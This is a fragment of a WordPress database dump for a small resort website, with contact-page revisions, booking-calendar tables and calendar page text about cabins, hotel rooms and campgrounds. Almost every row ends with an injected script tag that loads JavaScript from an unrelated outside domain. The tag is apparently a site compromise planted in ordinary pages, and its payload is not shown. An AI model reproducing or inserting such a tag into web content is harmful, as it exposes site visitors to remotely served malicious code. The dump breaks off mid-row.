01:19:36','',88,'http://ashbyresort.com/88-revision-v1/',0,'revision','',0),(834,2,'2019-06-14 07:28:52','2019-06-14 12:28:52','<p><a href=\"http://ashbyresort.com/calendar/\">Click here to book online</a></p><p>[wpforms id=\"613\"]</p><p>Email us at theashbyresort@gmail.com or call us at 218-747-2959</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Contact Us','','inherit','closed','closed','','92-revision-v1','','','2019-06-14 07:28:52','2019-06-14 12:28:52','',92,'http://ashbyresort.com/92-revision-v1/',0,'revision','',0),(835,1,'2019-06-16 10:33:29','2019-06-16 15:33:29','[[\"\",\"22-Aug\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"29-Aug\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"19-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"26-Sep\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3-Oct\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"TH\",\"F\"],[\"K-1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-2\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-5\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"S-6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"K-7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"V-9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 13\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CAB 14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','publish','closed','closed','','booking-calendar','','','2020-08-25 07:20:50','2020-08-25 12:20:50','',0,'http://ashbyresort.com/?post_type=tablepress_table&#038;p=835',0,'tablepress_table','application/json',0),(836,1,'2019-06-16 10:34:20','2019-06-16 15:34:20','[[\"\",\"6/15 - 6/21\",\"\",\"\",\"\",\"\",\"\",\"\",\"6/22 - 6/28\",\"\",\"\",\"\",\"\",\"\",\"\",\"6/29 - 7/5\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/6 - 7/12\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/14-7/20\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\"],[\"Cabin 1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 3\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 4\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 3\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 4\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground2\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground3\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground4\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Camground5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-06-16 10:34:20','2019-06-16 15:34:20','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(837,1,'2019-06-16 10:35:21','2019-06-16 15:35:21','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Ashby Resort Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Request a Booking\n					</a>\n		<p>Book your stay by calling (218) 747-2959. The calendar below is updated to show availability.</p><p>You can also send a request for booking  online by clicking Request a Booking above.<br />We will call you to confirm Reservation.<br />Remember that a deposit is required before a booking can be confirmed. <br />Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','publish','closed','closed','','csv-calendar','','','2019-06-16 20:50:55','2019-06-17 01:50:55','',0,'http://ashbyresort.com/?page_id=837',0,'page','',0),(839,1,'2019-06-16 10:35:21','2019-06-16 15:35:21','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 10:35:21','2019-06-16 15:35:21','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(840,1,'2019-06-16 10:36:31','2019-06-16 15:36:31','[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 10:36:31','2019-06-16 15:36:31','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(841,1,'2019-06-16 11:01:35','2019-06-16 16:01:35','[[\"\",\"6/15-6/21\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6/22-6/28\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6/29-7/5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/6-7/12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/14-7/20\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\",\"\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"S\"],[\"Cabin 1\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 2\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 3\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 4\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Cabin 5\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 1\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 2\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 3\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 4\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Hotel 5\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground1\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground2\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground3\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Campground4\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"Camground5\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-06-16 11:01:35','2019-06-16 16:01:35','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(842,1,'2019-06-16 11:32:48','2019-06-16 16:32:48','<p>Open dates for each of our units</p>		\n			<a href=\"#\" role=\"button\">\n						Book your vacation\n					</a>\n		[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:32:48','2019-06-16 16:32:48','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(843,1,'2019-06-16 11:33:33','2019-06-16 16:33:33','<p>Open dates for each of our units</p>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:33:33','2019-06-16 16:33:33','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(844,1,'2019-06-16 11:34:35','2019-06-16 16:34:35','<h4 style=\"text-align: center;\"><strong>Open dates for each of our vacation spots<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:34:35','2019-06-16 16:34:35','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(846,1,'2019-06-16 11:36:59','2019-06-16 16:36:59','<h4 style=\"text-align: center;\"><strong>Open dates listed for each of our vacation spots<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:36:59','2019-06-16 16:36:59','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(847,1,'2019-06-16 11:41:05','2019-06-16 16:41:05','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:41:05','2019-06-16 16:41:05','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(848,1,'2019-06-16 11:43:47','2019-06-16 16:43:47','<h4 style=\"text-align: center;\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br /></strong></h4>		\n			<a href=\"http://ashbyresort.com/calendar/\" role=\"button\">\n						Book your vacation\n					</a>\n		<p style=\"text-align: center;\">If the date you really wanted is booked call us and we can notify you if it becomes available.</p>[table id=3 /]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','CSV Calendar','','inherit','closed','closed','','837-revision-v1','','','2019-06-16 11:43:47','2019-06-16 16:43:47','',837,'http://ashbyresort.com/837-revision-v1/',0,'revision','',0),(849,2,'2019-06-16 16:08:44','2019-06-16 21:08:44','[[\"\",\"6/29-7/5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/6-7/12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/13-7/19\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/20-7/26\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7/27-8/2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"SAT\",\"SUN\",\"MON\",\"TUES\",\"WED\",\"THURS\",\"FRI\",\"\",\"SAT\",\"SUN\",\"MON\",\"TUES\",\"WED\",\"THURS\",\"FRI\",\"\",\"SAT\",\"SUN\",\"MON\",\"TUES\",\"WED\",\"THURS\",\"FRI\",\"\",\"SAT\",\"SUN\",\"MON\",\"TUES\",\"WED\",\"THURS\",\"FRI\",\"\",\"SAT\",\"SUN\",\"MON\",\"TUES\",\"WED\",\"THURS\",\"FRI\"],[\"KITCHENETTE 1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"X\",\"1\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHENETTE 3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHENETTE 5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 